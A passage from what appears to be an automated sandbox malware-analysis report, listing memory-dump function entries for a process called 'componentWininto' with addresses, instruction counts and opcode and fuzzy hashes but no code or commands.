                                                  • Instruction ID: 8fa5220c1ae99e35cd6a1a6a2b3214ea2444f059dd68d8ae196f7376019d8282
                                                  • Opcode Fuzzy Hash: e2c43fbda522775f2df603599888a951daf71e1496ef11265cefe67d0caeb191
                                                  • Instruction Fuzzy Hash: B7218822B1EBCA1FE7599BA848745F17FD0EF65264B4402BBE08EC70E3ED542809C345
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BADC330 Relevance: .1, Instructions: 92COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BADA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BADA000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bada000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7ce5ee55499a811060b710290cebd61675e99d669baf36573d32f707f15849ed
                                                  • Instruction ID: 34f98ae602de1fb4de233731e401c9f94f34e7c78144426991bccf81d7710537
                                                  • Opcode Fuzzy Hash: 7ce5ee55499a811060b710290cebd61675e99d669baf36573d32f707f15849ed
                                                  • Instruction Fuzzy Hash: 6131F13198E2CA4FD7169B70983A5F57FB0AF46314F1A02EBD059CA0A3DA6D5642C312
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAF1D0E Relevance: .1, Instructions: 91COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6fd680e83125b689a97528ac849657e7f65ceed9486c54538c412cc7370be6cb
                                                  • Instruction ID: 930d89e46e64a35107354b82ef41d741f2bea2831d86d9c31d6ff4629c643c70
                                                  • Opcode Fuzzy Hash: 6fd680e83125b689a97528ac849657e7f65ceed9486c54538c412cc7370be6cb
                                                  • Instruction Fuzzy Hash: 5821F731F0E74D4FE769D7A898722F87BF0EF65310B45007AD05EC76E2ED5869068641
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDBA671 Relevance: .1, Instructions: 91COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c39e5fc1a523cc35886afe9e6723b4eca52280d344d9e448ab8d9fb26a0e3454
                                                  • Instruction ID: 8ee5fadb38f56ef40efd6e7d8cbd69a04be8c2141701d87680d8087612ccf085
                                                  • Opcode Fuzzy Hash: c39e5fc1a523cc35886afe9e6723b4eca52280d344d9e448ab8d9fb26a0e3454
                                                  • Instruction Fuzzy Hash: 1B21F4B1F1E92D4FFB78969854259FD77E0EF49320B05217BE00BC3191DE1869008B41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAE6CA1 Relevance: .1, Instructions: 90COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 406c69471d9a83bdf318cac8fd9c0d9509258a79be4e032b7393a306d70ffb15
                                                  • Instruction ID: 84a8f3745cf10a3cb05d44f4314feda0e76ce4711b6014ea76da3c37c7138b35
                                                  • Opcode Fuzzy Hash: 406c69471d9a83bdf318cac8fd9c0d9509258a79be4e032b7393a306d70ffb15
                                                  • Instruction Fuzzy Hash: AA21C134A0AA0E8FDBA8EF68C4656BE77A0FF58305F0005BAD41EC31A5CA75A550CB40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDBE756 Relevance: .1, Instructions: 90COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a8c5f3e2c34f214fd4e023b1e528030a1bd40eb3e29569793ecbf50403f359ff
                                                  • Instruction ID: 721fb1b1e5b2acfa6a76453848f1561b7806c186e7589c66d5342cbe7f24deb2
                                                  • Opcode Fuzzy Hash: a8c5f3e2c34f214fd4e023b1e528030a1bd40eb3e29569793ecbf50403f359ff
                                                  • Instruction Fuzzy Hash: E3315471B1995E9FDB9CDB98D4A19B8B3A2FF54710B115539E01EC3292CF24B911CF80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDB7E60 Relevance: .1, Instructions: 90COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0081c0b5daf743d402c8c815d554ee7f6e24bf1a0c15ed5739b47fc97fbc6cbf
                                                  • Instruction ID: 368a349497d4c9b421c3327297a0d9f91b3e5fde348a5f7b33f6f4e42980f487
                                                  • Opcode Fuzzy Hash: 0081c0b5daf743d402c8c815d554ee7f6e24bf1a0c15ed5739b47fc97fbc6cbf
                                                  • Instruction Fuzzy Hash: 6A314C20B1E5BB4BE33D835848B05B47B51EF5632071956F9D09B8B0E7D81CB981C781
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAE75A5 Relevance: .1, Instructions: 89COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: adfd15bda2d1ebdfe43dcfba1f719214cdb3b3ab216e0238c6bb8ba6b41dee3f
                                                  • Instruction ID: d914978f76caf4a0956c76bd0a52af65647ce9f64978f5c034323f5b62a43006
                                                  • Opcode Fuzzy Hash: adfd15bda2d1ebdfe43dcfba1f719214cdb3b3ab216e0238c6bb8ba6b41dee3f
                                                  • Instruction Fuzzy Hash: 4E31E130A0A60E8FEB69EB64C4686FD77E1EF18304F1505BAC009D71E1DFB4AA408B50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDBD762 Relevance: .1, Instructions: 88COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a26a29e96949da8e05279d659161ea1bc9607dde97759b1664e848c97637b1ef
                                                  • Instruction ID: 21bc7a9109a554ea40f6a527a69e2931bafce73bba2619004c8986a4e2943306
                                                  • Opcode Fuzzy Hash: a26a29e96949da8e05279d659161ea1bc9607dde97759b1664e848c97637b1ef
                                                  • Instruction Fuzzy Hash: CF31F835A0995D8FDFACDB58C465AE877A1FF58310F4101ADD05FE72A1DA35AA80CF40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAF37A0 Relevance: .1, Instructions: 87COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7e4410cedc222c76b959703a9935b86793cff087ccac4bde1e0317f9f2a237d3
                                                  • Instruction ID: 02c2a4d11acae4a01a6f1d72b26a012f08f8ed90e5ddfecf02fccc3e9e8587ea
                                                  • Opcode Fuzzy Hash: 7e4410cedc222c76b959703a9935b86793cff087ccac4bde1e0317f9f2a237d3
                                                  • Instruction Fuzzy Hash: DF31FC10B1E6DB4AF739835448705F4BFE1EF5131071946BAD09A8B4E7C99CB985C7C1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDB1BF0 Relevance: .1, Instructions: 87COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3c0dd7e00479857f94e6f7b45906154996cc7491ae083dd8b96df87f25d0b4e2
                                                  • Instruction ID: 03875e89bcb83f782d00ac5c5784fdd1bd414f34c70bc335104ae01e0d307191
                                                  • Opcode Fuzzy Hash: 3c0dd7e00479857f94e6f7b45906154996cc7491ae083dd8b96df87f25d0b4e2
                                                  • Instruction Fuzzy Hash: BC312E24A2E5AA8EF33D875784705B4BB61EF5132071941FAD48BCB0F7C52C7A41CB81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDB6302 Relevance: .1, Instructions: 87COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b0f10448ffeb7940b1afe773ba99a38e596a737ea9aec5c87e0fc0e8bb3174dc
                                                  • Instruction ID: 684ce0b9995b37a4cb18e592bd7b71d6aefd2c5a204e78f1bd9a1f09d97ab99e
                                                  • Opcode Fuzzy Hash: b0f10448ffeb7940b1afe773ba99a38e596a737ea9aec5c87e0fc0e8bb3174dc
                                                  • Instruction Fuzzy Hash: 4D214171F1D91A9FDB58EA58D4A19A8F3A1FF58720B519139D01ED3292CF24BD11CF80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDB0511 Relevance: .1, Instructions: 87COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 51ec3f03321b712333a3d3eadbb55452fa86f2973ee43b2d9439cca36d689d2c
                                                  • Instruction ID: b3906b3f864a568159a13be4b4739ea8c55fed313aa23abc95182abce62ec5b0
                                                  • Opcode Fuzzy Hash: 51ec3f03321b712333a3d3eadbb55452fa86f2973ee43b2d9439cca36d689d2c
                                                  • Instruction Fuzzy Hash: 7231FA30A1991D8FDBA8EB98C465EAC7BF1FF58710F4541B9D00EE76A1DE38A9418B40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAEE732 Relevance: .1, Instructions: 86COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5e2c45e32d9c77267c814c04d66626ce57f749960870433bbc715014725e72e2
                                                  • Instruction ID: b2ca784787943a980fd9533aa5f70480200bdb8687ef3844731d0e264de42c97
                                                  • Opcode Fuzzy Hash: 5e2c45e32d9c77267c814c04d66626ce57f749960870433bbc715014725e72e2
                                                  • Instruction Fuzzy Hash: 20213920A1E5EA8AF7B9875844705747F91EF5131171986FAC0DACB4A7C86CBA86C381
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAE6E7D Relevance: .1, Instructions: 84COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5641e55fc785cff51817f1673bd72edc3863120e718550fc97a51e50fe78f216
                                                  • Instruction ID: 9a7664db0bc437a71c7247d7056189a68a0c07467e9f39e4afb9631d66f07229
                                                  • Opcode Fuzzy Hash: 5641e55fc785cff51817f1673bd72edc3863120e718550fc97a51e50fe78f216
                                                  • Instruction Fuzzy Hash: A7210530A0AA4E8FEB68EF68C4B61B937A1FF59304F0648BED41DC60E2DE75A504C741
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDBE823 Relevance: .1, Instructions: 84COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3752afb78acba195434d86830f9e115f6e08a7641fc47343ee8414e755dcfa1e
                                                  • Instruction ID: 3533296d8fbde898dfa199803b8af42f4505bd747ed21293c9e59aa9b8e32f9e
                                                  • Opcode Fuzzy Hash: 3752afb78acba195434d86830f9e115f6e08a7641fc47343ee8414e755dcfa1e
                                                  • Instruction Fuzzy Hash: 50210C35F0EA5E8FD7ACE76894722A477A1FF85320F451579E01EC32E2DE1859068B50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDB5282 Relevance: .1, Instructions: 84COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9ea5f29c81b2dd47485c04587dbeb504602a6827f0c6abd2b34c815eb77e6917
                                                  • Instruction ID: 42e53281847870c739da9611c524f5eac9f5e847a3873a8cdbb74ec8198ffdc7
                                                  • Opcode Fuzzy Hash: 9ea5f29c81b2dd47485c04587dbeb504602a6827f0c6abd2b34c815eb77e6917
                                                  • Instruction Fuzzy Hash: 8C31E631A0991D8FDF9CDA58C465AE8B7B1FF58324F0101AED04EE72A2CE35A9418F40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAF0BD2 Relevance: .1, Instructions: 82COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cee03ca6f01bb560f14e76567ebf3597e137a2f09c2994b8d2c9204da395be36
                                                  • Instruction ID: 0202c6a0042a1f1b69c029254543426ee9e4e432be19b31c025727fdd2858777
                                                  • Opcode Fuzzy Hash: cee03ca6f01bb560f14e76567ebf3597e137a2f09c2994b8d2c9204da395be36
                                                  • Instruction Fuzzy Hash: 1121FA31A1991D8FDFA8DF58C465AECB7B1FF68300F0101AED00EE3291CA75A9818B44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDBA2A5 Relevance: .1, Instructions: 82COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6ed5870bc0a54df7d8e36ca83a716519194d388386f4778f6d10d064bd70cacf
                                                  • Instruction ID: 30598e108115904958ba5abccb1f9cb507992d7d067369fe205d84947d130f1d
                                                  • Opcode Fuzzy Hash: 6ed5870bc0a54df7d8e36ca83a716519194d388386f4778f6d10d064bd70cacf
                                                  • Instruction Fuzzy Hash: AC216232F2DA2D4BEB6CD6ACD4A65FC73D5EF98720B451139E00BD3292DD286D028B41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAE864E Relevance: .1, Instructions: 81COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e35d939c3c18085b789f6a3e6e9aecb197e9fca40abab11b24fc814e17a5279b
                                                  • Instruction ID: 5b04a31d9f058dee053d5ab552ae84ae3e311748169a2d2e26b37f65ae9f2b98
                                                  • Opcode Fuzzy Hash: e35d939c3c18085b789f6a3e6e9aecb197e9fca40abab11b24fc814e17a5279b
                                                  • Instruction Fuzzy Hash: 4B213071E0991D8EEFA4DF489C557E9B3B0FB24310F1001A6D05DE3250DB745A868F81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDB0810 Relevance: .1, Instructions: 80COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 12cf2278a02206741ca4a1e03c2b474765d91bba82b863f80273236f5f3954f7
                                                  • Instruction ID: c2bf917055c310ad8cb697385c4b42b11e88cd5cbc5dac8025d94c40d3365d1d
                                                  • Opcode Fuzzy Hash: 12cf2278a02206741ca4a1e03c2b474765d91bba82b863f80273236f5f3954f7
                                                  • Instruction Fuzzy Hash: 9721D531B2A51D4FEB68EAACD8624FC7795FF84B20B451179E50BD32E6DD246D0287C0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAF37D0 Relevance: .1, Instructions: 79COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f5029f73356b44cf62266ea19996b441ecedf36412797834741d2c1f2d288de8
                                                  • Instruction ID: f19709e7a0efe00e733260796c383583132470a2388591c6f875be297a1f2e13
                                                  • Opcode Fuzzy Hash: f5029f73356b44cf62266ea19996b441ecedf36412797834741d2c1f2d288de8
                                                  • Instruction Fuzzy Hash: F121D320B1E66F4AF73C835484754F4BBE1EF94310B1546BED05A8B4ABC9ACBA8187C1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAE9238 Relevance: .1, Instructions: 79COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1fbcff51c4f9f2e329c8273581ff7f69910634dc2603169bfca805490e718827
                                                  • Instruction ID: 3c6eb7f1684edb569e07288eb2dd00d724925a5a6a618e1a65783e282c839cdd
                                                  • Opcode Fuzzy Hash: 1fbcff51c4f9f2e329c8273581ff7f69910634dc2603169bfca805490e718827
                                                  • Instruction Fuzzy Hash: C221D831E0A51D8FDFA8DB58D8A5AEDB3B1EF59300F5051A5D00EE32A5CE74AE81CB40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAE7B91 Relevance: .1, Instructions: 78COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 24f4389c8093132175f0dd3e61093bad5a581fb951a2d0b76a9108f94ee2088f
                                                  • Instruction ID: 6a6d27f5c85f14aac09cdd62e05bc561e43b530de8a6adb5f4e2bc765ccc037d
                                                  • Opcode Fuzzy Hash: 24f4389c8093132175f0dd3e61093bad5a581fb951a2d0b76a9108f94ee2088f
                                                  • Instruction Fuzzy Hash: 16216F34A0A50E8FDB98EF64C4695FA77A0FF19304F1105BAD41AC71A1DE75A951CB40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAD33E1 Relevance: .1, Instructions: 76COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bad0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c8b0fcf9b6f3bceb320332c8c7e0dcad78647a9623ecc679ba5df8de809c11fc
                                                  • Instruction ID: f44cc388d1e9b9e594c69efc6835c60fa74964c588ad04e7173caa6fa1deff87
                                                  • Opcode Fuzzy Hash: c8b0fcf9b6f3bceb320332c8c7e0dcad78647a9623ecc679ba5df8de809c11fc
                                                  • Instruction Fuzzy Hash: 86217C30A0A64E8FEB69EB64C4695BA77E0FF58305F014ABAD41DC71A1DF74E600CB40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAD3465 Relevance: .1, Instructions: 76COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bad0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f5ef1ca5670e189f7b30ea11a21e994118c5fb9f427e81c1e7fe4f09b13294c9
                                                  • Instruction ID: 751b9fad24c60195140ec89963cbccbdb1048fcc64688bc3de79923ea6567d2a
                                                  • Opcode Fuzzy Hash: f5ef1ca5670e189f7b30ea11a21e994118c5fb9f427e81c1e7fe4f09b13294c9
                                                  • Instruction Fuzzy Hash: 38219A70A0A64E8FDB69EFA4C4645BD77E0FF58305F1145BAD41EC71A1DA39A640CB00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDB0AF8 Relevance: .1, Instructions: 75COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 25fdcc3a4cbf28361ad83e446a2c8b332f017cb5c20b5dec87315543ee198f08
                                                  • Instruction ID: 10ea623e55427782cb8f838a11851fa77e30df38cedede1b024fe1427cff9559
                                                  • Opcode Fuzzy Hash: 25fdcc3a4cbf28361ad83e446a2c8b332f017cb5c20b5dec87315543ee198f08
                                                  • Instruction Fuzzy Hash: D621A020A0F3DA5FD72B47B558340A8BF956F02734B1A51FBC08A8B0F3C9081A4587EA
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDB08C9 Relevance: .1, Instructions: 75COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3a45d9e0c2c142ac115f0a69859c4877195cc07598d4eaae0318c04c5b937ffa
                                                  • Instruction ID: 1948ccd38e2636498ed5f2e99b440b731da448002bfd9811219c100c21abcf33
                                                  • Opcode Fuzzy Hash: 3a45d9e0c2c142ac115f0a69859c4877195cc07598d4eaae0318c04c5b937ffa
                                                  • Instruction Fuzzy Hash: A1110871B0E65D8FEB6CF6A898222A877D0FF54730F090179E05EC31E3E915690687C0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAD3340 Relevance: .1, Instructions: 74COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bad0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 20646341d21c05e13fa07805c9ef69406ba361680b2cfd442839a51a1e04e249
                                                  • Instruction ID: e79cfac94f8c46baedcc5ac03822edd85c44e2b61c53fcb1d67de0f00c5adfbc
                                                  • Opcode Fuzzy Hash: 20646341d21c05e13fa07805c9ef69406ba361680b2cfd442839a51a1e04e249
                                                  • Instruction Fuzzy Hash: 6021903094E68A8FE752ABB488685E97BF4FF4A310B0505E6D058C7072DA78A645C750
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAE7A6D Relevance: .1, Instructions: 72COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
